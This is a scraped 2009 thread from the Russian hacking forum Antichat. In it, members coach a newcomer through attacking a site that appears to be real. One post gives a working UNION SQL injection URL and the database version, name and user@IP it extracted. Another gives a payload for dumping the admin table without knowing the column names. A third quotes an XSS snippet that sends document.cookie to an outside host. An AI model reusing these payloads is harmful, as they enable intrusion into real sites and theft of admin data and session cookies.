Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
21.11.2009, 01:43
|
UID: 29116
USER: B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
Сообщение от Shaitan-Devil
Если IE обрезает, xss может действовать в других браузерах.
а тут не получиться использовать тогда php или SQL инексии? а то XSS_ом возится бесполезно. ничего интересного не получу.
|
|
|
21.11.2009, 01:47
|
UID: 43094
USER: ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от B1t.exe
а тут не получиться использовать тогда php или SQL инексии? а то XSS_ом возится бесполезно. ничего интересного не получу.
Ну тут скуля, тебе ж уже отписали выше
http://www.ru/vn84.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat(0x27,concat_ws(0x2F,version(),database(),user ()))+from+admin+limit+0,1--+
4.1.22/cctvline_dbb/cctvline_cctv@212.193.224.223
Подбирай названия столбцов таблицы admin
Последний раз редактировалось ElteRUS; 21.11.2009 в 01:56..
|
|
|
|
21.11.2009, 02:29
|
UID: 29116
USER: B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708
Репутация:
208
|
|
ElteRUS
ого )) спасибо. получил точно такое:
'4.1.22/cctvline_dbb/cctvline_cctv@212.193.224.223''
Не хочу выгядеть тупым, но не знаю я парвильно думаю?
4.1.22 - version
cctvline_dbb - database
cctvline_cctv@212.193.224.223 - user ?? (хотя тут не очень понимаю как так)
а что косается таблиц и столбцов - откуда унали, что сушествует таблица admin?
получается, что blind SQL ?
а есть ман какой-то? как вообше подбираеться столбцы(таблицы)..?
|
|
|
|
21.11.2009, 03:29
|
UID: 30257
USER: l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
с именами колонок в 4 версии туговато, квазар читает тему если что подправит наверно), а вообще, можно выводить данные не зная имена колонок,
/vn84.php?id=-1+union+select+*+from+(select+*+from+admin+join+ad min+a+join+admin+b)c--+1
где то мы разбирали это |
|
|
|
21.11.2009, 03:56
|
UID: 99963
USER: GenTao
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
Провел на форуме:
143706
Репутация:
-1
|
|
Сообщение от p.r0phe.t
В сервисе TFTP на 69 udp порту.
Причём тут ХТТП? оО
Какие ошибки нумеровать? ты о чём?
Я думал,у тебядве ощибки вместе было(про тфтп и эту хрень).Значит,у меня было что-то другое.Без скрина всё равно не пойму).
|
|
|
|
21.11.2009, 04:09
|
UID: 68170
USER: DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от B1t.exe
Не хочу выгядеть тупым, но не знаю я парвильно думаю?
4.1.22 - version
cctvline_dbb - database
cctvline_cctv@212.193.224.223 - user ?? (хотя тут не очень понимаю как так)
Ты не видишь в какой они последовательности написанны при sql инъекции?  И что тут не понятного...
Сообщение от B1t.exe
а что косается таблиц и столбцов - откуда унали, что сушествует таблица admin?
Быть может они предположили и попробовали?! Такой метод называется ручной брут...
Сообщение от B1t.exe
получается, что blind SQL ?
Какой ещё блайнд? Вывод на месте...
Сообщение от B1t.exe
а есть ман какой-то? как вообше подбираеться столбцы(таблицы)..?
Ручной брут + процесс можно автоматизировать, иногда в зависимости от особенности основного запроса можно узнать таблицы при помощи procedure analise() и т.д. и т.п.
|
|
|
|
21.11.2009, 06:17
|
UID: 56893
USER: gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
Сообщение от B1t.exe
cctvline_cctv@212.193.224.223 - user ?? (хотя тут не очень понимаю как так)
Просто MySQL-сервер установлен не на локалхосте, а на удаленной машине. MySQL-сервер имеет адрес и имя пользователя, используемого при коннекте
Сообщение от B1t.exe
а есть ман какой-то? как вообше подбираеться столбцы(таблицы)..?
Так как 4 версия мускула, то таблиц INFORMATION_SCHEMA нет, следовательно таблицы и колонки узнать можно только брутом(ручным или же разными скриптами, которые выкладывали в кодинге. Вроде SIPT тоже умеет)
|
|
|
|
21.11.2009, 08:56
|
UID: 95157
USER: p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604
Репутация:
19
|
|
Сообщение от Spyder
Это дело будет работать если на сервере в конфиге апача для метода PUT прописан специальный cgi скрипт, который создает файлы
Ну нету там веб-сервера! Смотри пор и демон,который висит на нём!
|
|
|
|
21.11.2009, 09:18
|
UID: 104128
USER: xofffff
Познающий
Регистрация: 16.11.2009
Сообщений: 38
Провел на форуме:
261594
Репутация:
15
|
|
Во многих статьях идет описания ворования куков с помощью xss.
Я как бы нашел все но вот уже часа 2 не догоняю что делает картинка 1x1px и куда сохрянятся куки? во многих статьях написанно про картинку
<script>
img = new Image();
img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
</script>
а что она делает? куда куки сохранятся? |
|
|
|
21.11.2009, 10:24
|
UID: 68170
USER: DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от p.r0phe.t
Ну нету там веб-сервера! Смотри пор и демон,который висит на нём!
Скорее всего тут прав Scipio и речь идет не про метод PUT, а про эфтипишную комманду 
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
